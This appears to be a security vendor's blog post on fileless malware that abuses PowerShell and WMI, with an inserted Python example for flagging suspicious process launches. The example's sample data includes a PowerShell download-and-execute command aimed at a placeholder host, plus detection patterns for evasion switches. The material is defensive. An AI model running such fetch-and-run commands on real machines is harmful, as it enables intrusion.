Fileless malware is surging. Can your existing endpoint solutions handle their evasive nature?

One of the most dangerous attack types today is fileless malware. Why dangerous? Because it is ten times more successful than file-based attacks, according to Ponemon’s State of Endpoint Security Risk Report. This form of evasive threat differs from traditional malware by keeping its malicious logic solely in the memory of the infected system, avoiding leaving any clearly malicious code on the file system. Such attacks also leverage built-in Windows tools such as PowerShell and Windows Management Instrumentation (WMI) to bypass detection. In essence, a legitimate process is used to carry out commands both locally and on remote endpoints, download payloads, and even launch other executables.

Fileless attacks are considered evasive in nature because of a few characteristics:

  • They have no signature to detect: Since the processes being run are part of the OS, there is no unique malware executable by which to identify the malware. Detection-focused AV is usually ineffective against this attack technique.
  • They use reputable tools: PowerShell and WMI are used by IT to perform legitimate tasks, so abusing these tools makes it difficult for endpoint protection solutions that monitor processes to spot malicious use.
  • They keep malicious code primarily in memory: Because there are no clearly malicious artifacts on the file system, detection-based AV approaches become ineffective at determining whether the program is malicious in intent.

Add to this the sheer power and control available through the abused legitimate tools: once a set of elevated credentials is compromised, fileless malware can move laterally through a network, increasing the scope of infection and the attacker’s reach. Cybercriminals are increasingly turning to fileless malware as their “go-to” toolbox, with PowerShell attacks surging 432% in 2017, according to the March 2018 McAfee Labs Threats Report.

So, how do you stop fileless attacks?

Many commonly used AV approaches are powerless to spot fileless attacks, making this one of the more challenging attack methods to stop. What’s needed is a way to prevent these attacks without relying on detection-based AV methods.

Fileless attacks are one of the Achilles’ heels of detection-based solutions, mostly because there are no tell-tale file artifacts to identify an attack. Detecting a fileless attack involves very detailed monitoring and analysis of any use of PowerShell or other mechanisms abused as part of such an attack: looking for similarities to previously seen malicious scripts, anomalous spawning of processes, connections to remote machines, and so on. Many endpoint protection and so-called “next-gen” AV solutions offer this kind of monitoring. The challenge with this methodology is that it is only effective against a small subset of fileless attack patterns. Attackers are still free to abuse tools such as PowerShell as long as the AV engine doesn’t consider the activity suspicious. Think about that: detection doesn’t mean fileless attacks are spotted the moment they occur; it means they are spotted once the behavior is deemed abnormal, which can be after malicious actions have already been taken.
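To make the kind of monitoring described above concrete, here is an added example (not code from the original post or from any product it describes) that scores constructed Sysmon-style process-creation records for the signals the paragraph names: a scripting host spawned by an unusual parent, evasion switches on the command line, and command lines that reach out to a remote URL. The record field names, the sample events and the heuristic lists are my assumptions.

```python
from __future__ import annotations
import re
from ntpath import basename  # splits Windows paths correctly even on a Linux analysis host

# Constructed Sysmon-style process-creation records (field names are an assumption,
# not a real log export): parent image, child image and the child's command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\rotate-logs.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QUFBQQ=="},  # placeholder blob
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage')\""},
]

# Scripting hosts the post calls "reputable tools" (pwsh/wmic added as assumptions).
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe"}
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EVASION_FLAGS = re.compile(
    r"(?i)(^|\s)-(nop|noprofile|w(indowstyle)?\s+hidden|e(nc|ncodedcommand)|ep\s+bypass|executionpolicy\s+bypass)\b")
REMOTE_FETCH = re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b)")

def suspicious_reasons(event: dict) -> list[str]:
    """Return the reasons a record looks like fileless tool abuse (empty list = nothing flagged)."""
    parent = basename(event["parent"]).lower()
    image = basename(event["image"]).lower()
    cmd = event["cmdline"]
    reasons: list[str] = []
    # Only records involving a scripting host matter, whether it is the child process
    # itself or is launched indirectly from the command line (cmd.exe /c powershell ...).
    if image not in LOLBINS and not any(b[:-4] in cmd.lower() for b in LOLBINS):
        return reasons
    if parent in DOCUMENT_APPS:
        reasons.append("anomalous spawn: scripting host launched by a document handler")
    if parent == "wmiprvse.exe":
        reasons.append("anomalous spawn: process created through WMI")
    if EVASION_FLAGS.search(cmd):
        reasons.append("evasion switches: hidden window / no profile / encoded command")
    if REMOTE_FETCH.search(cmd):
        reasons.append("remote connection: command line fetches content from a URL")
    return reasons

def find_suspicious(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index of every event with at least one reason, in log order, with its reasons."""
    return [(i, r) for i, e in enumerate(events) if (r := suspicious_reasons(e))]
```

Note that the first record (PowerShell run from Explorer with a plain script path) produces no reasons, which is exactly the gap the paragraph describes: an attacker whose activity stays inside what the heuristics consider normal is not flagged.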

In contrast, a prevention approach that isn’t grounded in detection-based AV algorithms can account for the context within which the attacker is attempting to abuse a legitimate OS component. For instance, it can deceive the malicious code into believing it cannot gain access to PowerShell or WMI, taking away its ability to infect. If the attacker’s code fails to locate or interact with its dependencies, it will exit or crash, thus failing to infect the endpoint.

Protecting Against Fileless Malware

If you’re like most organizations, you’re still relying heavily on detection as your primary means of protecting endpoints. And while some fileless malware can be detected based on its behavior, relying on detection alone increases the risk of a successful attack. By adding a solution that focuses on preventing fileless malware attacks without relying on detection, and that also fights other evasive malware techniques, you reduce the chance of a successful attack to a minimum.